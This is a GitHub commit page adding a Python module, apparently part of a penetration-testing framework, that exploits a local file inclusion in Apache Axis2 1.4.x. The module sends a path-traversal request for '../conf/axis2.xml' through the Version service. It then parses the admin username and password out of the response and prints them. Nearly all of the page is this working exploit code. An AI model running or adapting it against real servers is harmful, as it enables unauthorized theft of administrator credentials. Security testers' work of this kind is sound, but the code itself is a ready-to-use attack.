Skip to content

Commit

Permalink
Axis2 - LFI in 1.4.x aux module
Browse files Browse the repository at this point in the history
  • Loading branch information
hatRiot committed May 8, 2014
1 parent 4bc5846 commit 818a4e8
Showing 1 changed file with 41 additions and 0 deletions.
41 changes: 41 additions & 0 deletions src/platform/axis2/auxiliary/pw_lfi.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
from auxiliary import Auxiliary
from re import findall
from log import LOG
import utility

class Auxiliary:

def __init__(self):
self.name = 'Axis2 1.4.1 LFI'
self.versions = ['1.4']
self.show = False
self.flag = 'ax-lfi'

def check(self, fingerprint):
"""
"""

if fingerprint.version in self.versions:
return True
return False

def run(self, fingerengine, fingerprint):
""" Exploits a trivial LFI in Axis2 1.4.x to grab the
admin username and password
http://www.exploit-db.com/exploits/12721/
"""

utility.Msg("Attempting to retrieve admin username and password...")

base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/axis2/services/Version?xsd=../conf/axis2.xml'

response = utility.requests_get(base + uri)
if response.status_code == 200:

username = findall("userName\">(.*?)<", response.content)
password = findall("password\">(.*?)<", response.content)
if len(username) > 0 and len(password) > 0:
utility.Msg("Found credentials: {0}:{1}".format(username[0], password[0]),
LOG.SUCCESS)

0 comments on commit 818a4e8

Please sign in to comment.